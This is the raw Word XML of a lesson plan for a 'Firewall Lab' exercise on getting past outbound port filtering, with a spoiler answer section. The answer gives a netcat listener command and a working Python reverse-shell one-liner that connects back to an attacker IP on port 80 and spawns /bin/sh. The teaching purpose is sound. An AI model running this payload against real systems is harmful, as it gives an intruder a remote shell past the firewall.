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line="240" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>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rFonts w:ascii="Proxima Nova" w:cs="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova"/>
          <w:b w:val="0"/>
          <w:color w:val="039be5"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lesson Plan</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Firewall Lab</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9" name="image16.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="short line" id="0" name="image16.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39be5"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vrhvb96nxxe9"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Goals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Preparation</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What is Firewall?</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u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to bypass a firewall</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u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_skn3e6m28u4k" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Goals</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Learn how to bypass firewall rules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get reverse shell on this machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6hgqe4dzrinp" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Preparation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali linux VM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Openvpn connection to the security lab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: 10.11.1.144</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color w:val="505050"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fnjk6vnqzbqk" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is Firewall?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="505050"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2114550" cy="221932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145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8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="505050"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A firewall is a software program or piece of hardware that helps screen out hackers, viruses, and worms that try to reach your computer over the Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="white"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.microsoft.com/en-us/safety/pc-security/firewalls-whatis.aspx</w:t>
        </w:r>
      </w:hyperlink>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xl4e2s4t9pty" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Bypass Firewall?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario: A company only listens on specific ports for the services they run, and they only allow normal traffic like HTTP or HTTPS outbound. This means you cannot do reverse shell on port 8080 back because it is neither port 80 or 443 outbound. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In order to bypass this rule in firewall, you can simply spawn reverse shell on port 80 or 443 or other ports available such as port 8080 which does NOT require root privilege to open. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wnbcns8hksus" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Target machine is running same web server as the reverse port forwarding lab with a little bit of firewall restrictions!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypass firewall restrictions and create a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7vl1ktld6kcm" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SPOILER ALERT!!!!!</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1"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5b3z5cu1pn7" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">==============ANSWER===============</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Same exact lab as port forwarding lab with two web servers. One running public as user info341 and another web server running locally as root user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I’ve only added some firewall rules to play with bypassing simple firewall rules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Current Firewall Rules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="124460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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1054100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inbound (Only allow)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">80, 8080, 443, 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Outbound (Only allow)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">80, 22, 443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If I try to reverse shell on port 1234, it will be blocked by outbound firewall rule.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5743575" cy="64770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435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2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, most computers will have port 80 or 443 open for outbound because that is necessary to browse websites. We can use this to our advantage and reverse shell through those ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On your attacking machine, use netcat to listen on port 80 or 443 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nc -lvp 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now change the reverse shell payload to match our port number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.0.3",</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you have bypassed the firewall and spawned a reverse shell.</w:t>
      </w:r>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438150</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7781925" cy="409575"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapTopAndBottom distB="0" distT="0"/>
          <wp:docPr descr="footer" id="7" name="image14.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="footer" id="0" name="image14.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438150</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7781925" cy="409575"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapTopAndBottom distB="0" distT="0"/>
          <wp:docPr descr="footer" id="1"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6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-66674</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7781925" cy="95250"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapTopAndBottom distB="0" distT="0"/>
          <wp:docPr descr="horizontal line" id="10" name="image17.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="horizontal line" id="0" name="image17.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666666"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
          <wp:extent cx="447675" cy="57150"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:docPr descr="short line" id="3" name="image7.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="short line" id="0" name="image7.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640" w:line="30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descr="horizontal line" id="4" name="image8.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="horizontal line" id="0" name="image8.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5.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6.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/safety/pc-security/firewalls-whatis.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